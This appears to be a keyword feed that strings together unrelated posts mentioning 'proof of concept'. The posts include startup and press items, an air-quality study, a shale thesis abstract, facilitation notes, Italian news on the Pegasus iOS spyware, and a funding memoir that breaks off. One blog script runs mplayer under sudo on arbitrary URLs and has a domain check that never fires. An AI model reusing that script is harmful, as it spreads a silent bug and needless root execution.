It wasn't long before Gleason found herself immersed in the world of healthcare, technology, and startups. It was there she found her purpose. Gleason noticed a problem in the medical industry that no one seemed to be talking about or trying to solve. Doctors and patients alike were getting bogged down with paperwork that was often confusing, and as a result, many were dealing with huge costs simply by filling out the wrong forms.

The next nine months were spent at her kitchen table, furiously working on a solution to this problem. That solution would end up becoming Eligible, a medical billing startup designed to make it as simple as possible for doctors and insurance companies to work together and save everyone money, patients, doctors, insurance companies alike.

As a two-time alumni of Y-Combinator, Gleason led Eligible from quietly testing and validating its product to becoming an explosive fast-growth company. Today, Eligible processes 14 million transactions per month, with a projected 50 million transactions by the end of the year, and has raised more than $25 million in funding.

In this week's episode you will learn:

  • Every step you need to take as the founder of a startup, from validating to raising capital
  • How to gain proof of concept as quickly as possible
  • Where to find co-founders to complement your own skills and talents
  • What strategies you can use to build a fast-growth company
  • How to manage the people around you and keep them focused on your goal
  • & much more!

          MultiTech’s Conduit™ LoRa Starter™ Kit Speeds Deployment for LoRa® Technology        

Enables Quick Connections Between LoRa Proof of Concept to the Cloud

(PRWeb July 19, 2016)

Read the full story at http://www.prweb.com/releases/2016/07/prweb13561827.htm


          Tracking air quality from high in the sky        
October 21, 2015 | NCAR scientists have demonstrated how new types of satellite data could improve how agencies monitor and forecast air quality, both globally and by region. The scientists used computer simulations to test a method that combines analysis of chemistry-climate model output with the kind of data that could be obtained from a planned fleet of geostationary satellites, each of which would view a large area of Earth on a continuous basis from high orbit. For example, with a constellation of satellites, the system could be used to measure, track, and predict the effects of pollution emitted in Asia and transported to the western U.S., or the impacts of wildfires in the Pacific Northwest on air quality in the Midwest. A high-orbit geostationary satellite could view a large area of the Earth, such as North America in this illustration, on a continuous basis. (Image courtesy NASA/Langley Research Center). "We think the new perspective made possible by geostationary sensors would provide data that is useful for everyday air quality forecasting, as well as for early warnings about extreme events, like the effects of wildfires," said NCAR scientist Helen Worden, one of the members of the research team. The NCAR team reported their test of the system's potential in a paper co-authored with a NASA scientist that appears in the journal Atmospheric Environment. Current observations are mostly taken from low-elevation, globally orbiting satellites that provide only one or two measurements over a given location per day, thus limiting critical air quality observations, such as vehicle emissions during rush hour. ­One exception is an air quality forecasting system at the National Oceanic and Atmospheric Administration that uses geostationary sensors to provide information about tiny polluting particles known as aerosols. But that system doesn't track carbon monoxide, a primary indicator of air pollution that serves as a good chemical tracer for observing how pollutants are emitted and dispersed in the atmosphere. "Carbon monoxide lives long enough—a month or two—that you can track it around the Earth," Worden said. To fill in the data gap, several countries and space agencies plan to deploy geostationary satellites by the end of the decade to observe and monitor air pollutants over North America, Europe, and East Asia. Proof of concept The team members applied a statistical technique that they and colleagues have developed over the years to analyze data obtained by an instrument aboard NASA's globally orbiting Terra spacecraft called MOPITT (Measurement of Pollution in the Troposphere). A collaboration between the University of Toronto and NCAR, MOPITT pioneered the measurement of carbon monoxide from space. Starting with MOPITT's real-world observations, the scientists then produced a data set of hypothetical observations representative of those potentially obtainable from a constellation of geostationary satellites. They visualized their results on high-resolution maps, producing results for areas as small as 2.7 miles (7 kilometers) wide that extend as high as 7.5 miles (12 kilometers) into the atmosphere. Measurements of carbon monoxide in April 2014 from the MOPITT instrument  (Measurement of Pollution in the Troposphere) aboard NASA's globally orbiting Terra spacecraft. The boxes show the observing domains for geostationary satellites and red colors indicate high levels of carbon monoxide. (©UCAR. Image courtesy Helen Worden, NCAR. This image is freely available for media & nonprofit use.) When it comes to speed and cost, the NCAR method has several advantages. A month's worth of data, about 200 million data points, can be produced in less than 12 hours using a standard desktop computer. "The model produced very realistic results on high-resolution maps at a low computational cost," said NCAR scientist Jerome Barre, who led the study. The scientists caution that there are limitations to the new system when viewing extremely polluted areas. The team accounted for the impact of clouds in their model to simulate the most realistic measurements.  Next steps A geostationary satellite positioned at about 22,000 miles above the equator will orbit in sync with the Earth’s rotation, thus remaining fixed above the same region. Measurements by the satellite's instruments can be taken many times a day. A constellation of such satellites would provide the coverage over populated regions needed to provide enough data to analyze air quality and atmospheric composition, determine whether the pollution is human-made or natural, and track its movement. In addition to carbon monoxide, instruments on these satellites would gather data on other pollutants, such as nitrogen dioxide and ozone. "Combined, those will give you good indications of the chemical conditions of the atmosphere," Barre said. That would enable scientists to track pollutants both vertically and horizontally in our atmosphere, he said, and that is "what's really needed to monitor, forecast, and manage air quality on a daily basis." About the article Jerome Barre, David P. Edwards, Helen M. Worden, Arlindo Da Silva, and William Lahoz, 2015: On the feasibility of monitoring carbon monoxide in the lower troposphere from a constellation of Northern Hemisphere geostationary satellites. (Part 1). Atmospheric Environment, 113, 63-77, doi:10.1016/j.atmosenv.2015.04.069 Writer/ContactJeff Smith, Science Writer and Public Information Officer Collaborating organizations NASA Norwegian Institute for Air Research FundersNational Science FoundationNASA

          Eclipse GUI Test Automation: American Power Conversion Corp. uses Squish for Java        
The team researched for a suitable tool, and during that process they downloaded an evaluation copy of Squish. They used the evaluation copy to produce a proof of concept, and having successfully done this, they then contacted several companies who were already using Squish for their test efforts. After completing their research and satisfying themselves that Squish would meet their needs, they purchased their Squish licenses.
From a technical point of view, several reasons led to APC choosing Squish for automating InfraStruXure's functional GUI tests, rather than some other tool. On key reason was Squish's cross-platform support, which means that the same test scripts can be run against their user interface on both Windows and Linux.
          Endless scrolling based on a simple HTML pager        
keejoz: Er gebeurd helemaal niets bij mij? Ik begrijp het niet echtIk heb in het demootje het aantal items per pagina op 12 gezet i.p.v. 6, dat zal waarschijnlijk wel zorgen dat iedereen een scrollbar krijgt. 't Is overigens nog steeds maar een proof of concept, he Precision: Het kan een hype zijn en ze kunnen er op het werk willen op springen, tof dat ze ook buzzwords kunnen gebruiken.Dat is wel een fenomenabele manier om iets uit z'n verband te trekken zeg Frappant dat het een blogpost is die over implementatie gaat, i.t.t. interactie-ontwerp, waar iedereen blijkbaar wel een mening over heeft. Volledig misplaatst, als je het mij vraagt.
          Endless scrolling based on a simple HTML pager        
Endless scrolling is nice concept, but I just can't seem to get used to the unusable scrollbar. Normally it give's a good idea of the size of the page and your position on it. That combined with the regular paging i'm able to get good idea about the length of the total content and my progress in it. Without this I start to feel sort of lost on a page. So for me it feels like endless scrolling is a usability degrading form of lazy loading. I did like the presentation and implementation of your proof of concept!
          Also, a little close up!        
Also, a little close up of a proof of concept experiment on today's project. Turns out, it's possible to braid around solid objects like this little ring. I'm not sure yet where this would be useful, but it's good to know that it's possible!

          An [for the web] old classic – no-click interface proof of concept        
http://www.dontclick.it/Posted in design, flash, human-machine interface
          Fracture and hydraulic fracture initiation, propagation and coalescence in shale        
Fracture and hydraulic fracture initiation, propagation and coalescence in shale AlDajani, Omar AbdulFattah Even though hydraulic fracturing has been in use for more than six decades to extract oil and natural gas, the fundamental mechanism to initiate and propagate these fractures remains unclear. Moreover, it is unknown how the propagating fracture interacts with other fractures in the Earth. The objective of this research is to gain a fundamental understanding of the hydraulic fracturing process in shales through controlled laboratory experiments where the underlying mechanisms behind the fracture initiation, -propagation, and -coalescence are visually captured and analyzed. Once these fundamental processes are properly understood, methods that allow one to produce desired fracture geometries can be developed. Two different shales were investigated: the organic-rich Vaca Muerta shale from the Neuquén Basin, Argentina and the clay-rich Opalinus shale from Mont Terri, Switzerland, which were shown to vary in mineralogy and mechanical properties. Specimen preparation techniques were developed to successfully dry cut a variety of shales and produce prismatic specimens with pre-existing artificial fractures (flaws). The Vaca Muerta shale specimens were subjected to a uniaxial load which induces fractures emanating from the flaws. Two geometries were tested: a coplanar flaw geometry (2a-30-0) resulting in indirect coalescence and a stepped flaw geometry (2a-30-30) resulting in direct coalescence. These "dry" fracture experiments were analyzed in detail and corresponded well to the behavior observed in the Opalinus shale. This result shows that the fracture behavior in Opalinus shale can be extended to other shales. A test setup capable of pressurizing an individual flaw in prismatic shale specimens subjected to a constant uniaxial load and producing hydraulic fractures was developed. This setup also allows one to monitor internal flaw pressure throughout the pressurization process, as well as visually capture the processes that occur when the shale is hydraulically fractured. Three fracture geometries in Opalinus shale were tested using this developed setup: single vertical flaw (SF-90) for the proof of concept of the test setup, stepped flaw geometry (2a-30-30) which resulted in no coalescence, and stepped flaw geometry (2a-30-60) which resulted in indirect coalescence. Of particular interest were the observed lag between the crack tip and the liquid front as well as the way the hydraulic fracture propagates across and along bedding planes. A systematic difference was observed when comparing crack interaction behavior for "dry" and hydraulic fracture experiments for various flaw geometries. The result of this thesis will add to fundamental knowledge of how fractures behave and interact under various loading conditions, flaw geometries, and materials serving as a basis for predictive fracture models. Thesis: S.M., Massachusetts Institute of Technology, Department of Civil and Environmental Engineering, 2017.; Cataloged from PDF version of thesis.; Includes bibliographical references (pages 152-154).
          Fresh From a Stream        

At tonight's San Fernando Valley LUG meeting, our friend Larry was at it again, trying to access media streams from http://www.freetv.com from the text console, preferably from the Lynx browser. After a lot of floundering around, we managed to play a few of the URLs given in descriptive text (not expressed in HTML links) with mplayer.

After arriving home, here are some things I found to explore the site with.

Install Privoxy, and add the following to your /etc/privoxy/user.action file(or perhaps the /etc/privoxy/standard.action if the release of Privoxy you are using doesn't have the user.action file):


{ +filter{freetv} }
.freetv.com

Then add the following to /etc/privoxy/user.filter (or /etc/privoxy/standard.filter if your Privoxy doesn't use a user.filter):


#################################################################################
#
# freetv: Try to convert certain URLs floating in space to actual links
#               05/31/2008 d.e.l.
#
#################################################################################
FILTER: freetv Try to convert certain URLs to automaticly launch jlinks

s| (mmst?://[^ <>]*) |<A href="$1">$1</A>|igsx


Restart privoxy, typically with

sudo /etc/init.d/privoxy restart

Then, install this script, I called it mmStreamer somewhere in a directory in your PATH variable:


#!/bin/bash


URL="${1}"    ;


TURL=${URL#*://}      ;
TURL=${TURL%%[/?]*}   ;
echo 'Domain: '  ${TURL}          ;

ping  -qc 3  ${TURL}    ;
DOMAIN_TEST_RESULT=$?  ;

if [ ! ${DOMAIN_TEST_RESULT} ]
then
  echo "The domain ${TURL} seems bogus.  Hit return to continue."  ;
  read  BOGUS  ;
  exit  ;
fi

sudo mplayer -vf-clr "${URL}"    ;



sudo mplayer -vf-clr -playlist "${URL}"   ;

exit  ;

You may need to modify the lines with mplayer to match how you normally invoke mplayer, just make sure one has the -playlist parameter so one or the other may run. And of course, make sure to adjust permissions with chmod ugo+x mmStreamer. There are probably many improvements that can be made to this script, but it is partly a proof of concept script, partly something to get rolling with some quick results.

Then to your lynx.cfg file, add to the EXTERNALs section add:

EXTERNAL:mms:mmsStreamer %s:TRUE:TRUE

The last 'TRUE' will cause mmsStreamer to be run automaticly when you activeate a link with type mms.

Now, the next time you go to http://www.freetv.com, you should be able to play some of the mms stream URLs, that will now be actual links. Some of them seemed to be mere ads, others seemed to have bonafide content. A few might be missed, I noticed one with the typo of two colons (mms:://) and a Google search of the site turned up couple of http streams. These seem to be the exceptions that will have to still be handled by hand. A lot seemed no longer there, but perhaps a better choice of mplayer switches and settings might tap into them.

    A few things turned up browsing the site.
  • One is that I was reminded of the http://www.la36.org site, with a lot of Los Angeles local content. I didn't have the time to investigate if it is being updated, but I did notice a few videos of past L.A. Public Library / Library Foundation ALoud talks. A few of these are of technical interest, such Craig "List" Newmark, and one on the Google Book project.
  • I probably should ad some capability to deal with http://www.la36.org to usnatch
  • I was spurred to search Wikipedia for http://www.freetv.com and it turned up http://en.wikipedia.org/wiki/Public_access_stations_%28United_States%29. Perhaps some creative search will turn up a few other pages to explore.
  • http://www.drgenescott.com didn't seem to be active, but it did remind me of the many times I'd passed him the TV dial in days past, and the many discussions of this archtypal L.A. CA personality.

          Facilitating at the Leadership Summit        
Drawing by Hilda Anggraeni

Earlier this month BCcampus hosted a one-day Learning, Teaching and Ed Tech Leadership Summit. The purpose of the summit and subsequent steps was to bring together provincial leaders to collaborate, innovate and solve problems. The day was organized as a participatory and emergent process to:
  • identify issues and challenges
  • begin to think about solutions
  • discuss how we will work together as a consortium
  • begin planning our first open event
  • discuss how decisions are currently being made with respect to Ed tech choices and implementation
  • gain feedback on a proposal for a new provincial teaching with technology award
The Challenges and Solutions participatory graphic wall anchored the discussions throughout the day. Ultimately we wanted to situate ourselves in the landscape of working as a collective -- system wide.

My facilitation role was around the "how we will work together" piece. Here are my prep and process notes, along with some reflections on how it all went.

Collaborating as a consortium

Key questions guiding this activity:
  • What are the results/outcomes we want?
  • What do you want from each other? 
  • From BCcampus? 
  • How do you envision the group working? 
  • Who will lead? 
In this visioning session, I used the Purpose to Practice Liberating Structure (P2P). The focus is on what we can do as a collective, so P2P seemed like an ideal choice. We worked together to define what our collective goals might be, and the essential elements of our future collaborative work: purpose, principles, participants, structure, and practices (and more photographs of the output)

I created a large, colourful poster for each group of the 5 groups, along with discussion questions on index cards for prompts.

Here are my personal and rough notes to guide my own facilitation. I like to use Evernote on my iPad for that -- it fits with my habits of updating the outline at the last minute, inserting notes as I listen to conversations leading up to the session.

11:10 set up
  • Clearly have a lot to work on
  • Many great discussions, creative solutions.
  • How can we work together
  • We already have a good start on getting our heads into this
  • Just first steps in thinking about this.
  • Next 50 minutes generating ideas about how to accomplish what we want to do
  • This is going to be rapid and definitely unfinished
  • Sharpen later
  • Liberating structures - a variation on purpose to practice
  • 5 elements - lots of overlap
  • You can choose to think out one project as proof of concept, but don't get too hung up on details. We're talking about many projects and potentially many years
  • Work through one together - purpose - then in 4 groups

11:20 Purpose
  • Guiding questions. Read them
  • Individual
  • Table
  • Report out one statement from each table
  • One person write on flip chart
11:35 Elements
  • Short description of each group
  • Guiding question / add your own questions on cards
  • Feel free to move around to other tables to see their questions
  • Jot down your ideas and thoughts on post it notes
  • Individual
  • Table
  • Capture capture capture on post it notes
  • Start: one person from each table pick up your element package
11:50
  • Take what's on the table and display it over lunch
  • Encourage you to visit each element and zone in on some of the details
  • Promise to capture and report back
  • Promise to organize next steps

Purpose

Leadership Summit 2014

We worked through the Purpose activity together (individual, each table, report back). Key questions:
  • Why is this work important to you? 
  • What is our core reason for working together? 
  • Why is this work important to the larger community

Principles

Leadership Summit 2014

Key questions:
  • To fail, what must we do? 
  • To succeed, what must we do? 
  • What are the things we don't want to repeat? 
  • What is one BIG thing on the "must do" list? 
  • What is one small thing on the "must do" list?

Participants


Leadership Summit 2014

Key questions:

  • Who should be included?
  • Who will move things forward at your institution?
  • Who can contribute?
  • Where do you see yourselves (as a group) in terms of your participation?
  • At the end of the day, where will you pin your name on the landscape?
  • What is the role of BCcampus?

Structure

Leadership Summit 2014

Key questions:

  • How is work distributed?
  • How do we organize ourselves?
  • What important conversations do you need to have to make things happen?
  • What do we need to support our work?
  • How is control distributed?
  • Where do YOU fit in? 

Practices

Leadership Summit 2014

Key questions:

  • What are our milestones?
  • What will stand in our way?
  • What will we do and how?
  • What are the outcomes of our work together?
  • What will have changed one month from now?
  • What will have changed one year from now?

How did it go?

There were some excellent discussions! It seemed well paced, and the invitation to transfer and arrange the notes over lunch was well received (that's always a risky request!). This Liberating Structure activity tied in well to the rest of the day as we moved forward to discuss personal commitment and next steps. 

As with any implementation of a new facilitation structure, it took careful planning -- it seems so easy on paper, but in the moment you realize the importance of clear explanations of the process. If you send everybody off into groups without a solid understanding of tasks, as well as the purpose of those tasks, it can get a bit chaotic. Making the table rounds helped to clarify any confusion. 

I've never been able to follow "recipes" completely. I always invent variations, which isn't such a bad thing, but there is something to be said for following the design as written. Ha! I might try that next time. 


          Sicurezza: aggiornare iOS per proteggersi da Trident e Pegasus        

La parte buona della notizia è che Apple ha già rilasciato un aggiornamento per sanare la vulnerabilità.
La parte negativa è che la vulnerabilità c’era e anche importante, per lo meno stando a quanto riferito nelle ultime ore da Citizen Lab e Lookout che hanno scoperto una minaccia attiva che sfruttava tre vulnerabilità zero-day critiche in iOS.
“Trident” è il nome dato a questo tipo di vulnerabilità dagli esperti, che dichiarano di aver lavorato a stretto contatto con Apple, che ha per l’appunto rilasciato immediatamente la sua patch 9.3.5, con la raccomandazione di aggiornare subito i propri sistemi.

Cosa sono Trident e Pegasus

Trident, spiegano gli esperti, è utilizzato in uno spyware dal nome Pegasus, sviluppato da NSO Group, una organizzazione costituita in Israele e nota per le sue attività in ambito cyber war, attacchi zero-day, offuscamento, malware a livello di kernel. Pegasus è in grado di aprire un canale di comunicazione cifrato tra l’utente colpito e il server remoto ed è in grado di accedere a messaggi, chiamate, email, dati di log e altre informazioni tratte da app come Gmail, Facebook, Skype, WhatsApp, Viber, FaceTime e altre ancora.
Non solo. Una volta che si è autoinstallato nel dispositivo, questo malware non viene rimosso né reimpostandolo né aggiornandolo.
Non stiamo dunque parlando di un proof of concept, ma di un malware attivo che sfrutta vulnerabilità presenti da tempo e che è stato utilizzato per attaccare direttamente politici, personalità pubbliche, attivisti, giornalisti.

L’attacco ad Ahmed Mansoor

La scoperta di Trident è dovuta all’azione di Ahmed Mansoor attivista noto per le sue denunce sulle pratiche repressive da parte di alcuni governi mediorientali, il quale ha ricevuto un messaggio con l’invito a consultare un dossier sulle torture in atto nelle carceri degli Emirati Arabi Uniti.
Mansoor, che da tempo dichiara di essere target di attacchi malware, non ha cliccato sul link propostogli, cosa che avrebbe di fatto dato accesso e controllo ad altri del suo iPhone, ma  ha inoltrato il messaggio a Citizen Lab, che ha poi svolto le indagini insieme ai tecnici di Lookout.

L'articolo Sicurezza: aggiornare iOS per proteggersi da Trident e Pegasus è un contenuto originale di 01net.


          Volume Rendering in Avogadro        

Since joining Kitware I have had limited spare time to work on Avogadro, and for various reasons my spare time has been more limited than usual too. Since the new year I have been able to start spending more time working on Avogadro, and open source chemistry in general, thanks to an SBIR phase I proposal that was funded last year with the US Army Corps of Engineers. This is exciting for a number of reasons, including the fact that I have the opportunity to prototype exciting new features for chemistry visualization, workflow and data management.

One of the new bits of work I have been doing is to use some of the advanced visualization techniques in VTK such as GPU accelerated volume rendering. Now the code is still pretty rough, and is more a proof of concept. I wrote a simple external Avogadro extension that links to and uses VTK to render the first volume found in the current Avogadro molecule. All of the parameters are currently fixed, I am hoping to get the time to add in more options along with some integration of the Avogadro rendered molecule in the VTK render window. You can view the code here, please bear in mind it is at a very early stage.

I have also been working on several other things such as splitting out the quantum calculation code from the Avogadro plugins, and putting it in a small library. I have called the library OpenQube, right now it only has the base functionality that was in Avogadro but I will be extending it with more features, regression tests and I am hoping due to the decoupled nature and liberal BSD license it will encourage wider collaboration in this field.

There is also the Quixote project which I am very excited about. Meaningfully storing the results of quantum calculations, annotating them and retrieving them within an open framework. This is a growing problem in todays world, and I am working on extensions to Avogadro to allow it to fully exploit the semantic chemical web. This includes some of the previous work to access the PDB and other public resources as well as private databases within groups and organizations.

I think this is going to be a very exciting year for Avogadro, and open source chemistry in general.


          Funding Tales - The Missing Link of High404 (Part 1)        

As part of the HighWire MRes/PhD programme we take a module (High404) dedicated to introducing digital innovation to the cohort.  This may seem a little odd, you’d kind of expect every one taking such a programme to already be well versed in such things - this is after all  a PhD in Digital Innovation funded through the EPSRC’s Digital Economy theme.

But what make the HighWire crowd so unique is the incredibly wide and varied backgrounds of those in it.  In my cohort we go from fine art to computer science backgrounds and inevitably this means some are not as well versed in the digital as others.

Hence the module.  It’s not designed to make experts of everyone rather open eyes to history and futures.

The module is split in two.  A narrative which focusses upon the more traditional bits of digital innovation with topics such as mobile, cloud computing, ubiquitous computing, Web 3.0 and such.  And a meta-narrative which takes a wider look at the role of innovation with respect to such things as being meaningful, sustainability and the like.

Overall the module has provided me with a tonne of material to ponder, primarily in the meta-narrative (what with already having a pretty solid background in the narrative material) but there has been one topic point that was not raised and yet it is so very vital to innovation…

FUNDING

Innovation is so much more than invention.  It’s not about coming up with a great idea but rather being able to execute on that idea, develop and evolve it, bring it to the market (not necessarily a commercial one).   And this requires money, to research and develop the invention AND to bring it to market.   But first my own tale of funding digital innovation.

Cakehouse in the Bubble

Right at outset of the first dot-com bubble in the late 1990’s I was proud to be a co-founder of a technology startup - Cakehouse Systems.   We had a superb team of thinkers and arguably some of the best software developers in London hand picked and armed with proper ninja coding skills with C++ and Java being core.

At the time website search engines were really not a lot different to an offline Yellow Pages.  You filled out a form with the details of your fledgling website and submitted it to most likely Yahoo! who employed a army of staff to check you had correctly categorised your entry before allowing it into their carefully curated directory.

We had a superb idea.  Why not automatically map the links between websites, not only the hyperlinks themselves but also the semantic links?  Then allow people to manually augment those links with other information that had meaning to them. Effectively we were proposing building a semantic search engine for the Web based on a graph database - something truly novel at the time.

Unlike so many others in the bubble who were willing to work for equity our crack team were not going to work for free. Thankfully we did not have the truly extravegant burn rates so common with other Internet startup companies at the time.

One example of all too common dot-com boom/bust was a company I knew well -Sportal (formally Pangolin) had in 1998 raised something in the order of £55M - but by 2001 BSkyB (an investor) refused to buy the ailing business for £1 the company laying over the majority of its staff having used the money to pay incredible salaries and furnish lavish offices.

We were somewhat more modest in our habits but even with equal shareholding and salaries across the company some third party funding was going to be needed for an office, hardware, software licenses and so on.  Seed funding was readily obtained from a wealthy family member of the team.  A large six figure sum that with our modest outlook meant we were stable for 18 months, we even employed three more staff - a sales person and two more developers.  Things were looking good.

We worked hard, developed a great proof of concept and wrote a rock solid business plan.  A plan we took to several leading IT accountancy companies looking for help raising the next round of funding, a round big enough to build an Internet scale semantic search engine prototype.  It was a slog.  I honestly can’t recall how many funding meetings I attended with the managing director but it seemed like hundreds.

This slog was so difficult because Computer/Data/Internet Technology innovation funding was discontinuous from previous innovation adoption s-curves. None of the traditional UK based Venture Capitalists (VCs) knew how to approach it and rather adopted funding models from the curve of existing capital intesnsive innovation.  The importance of Angel investing was largely unrecognised at the time and with little or no Angel funding ecosytem they flew well below the radar.
As a note Silicon Valley VC's were able to adapt/adjust better than others simply because their risk profiles were vastly different and they had had more exposure to technology companies. 
Eventually did find and engage someone and went on to talk to dozens and dozens of potential VCs, but by then the market had changed.  Three things had happened.

The first was VCs, certainly in the UK, had been stung by many of those high profile high burn rate startups that held extravagant launch parties based on vapourware.  Very very few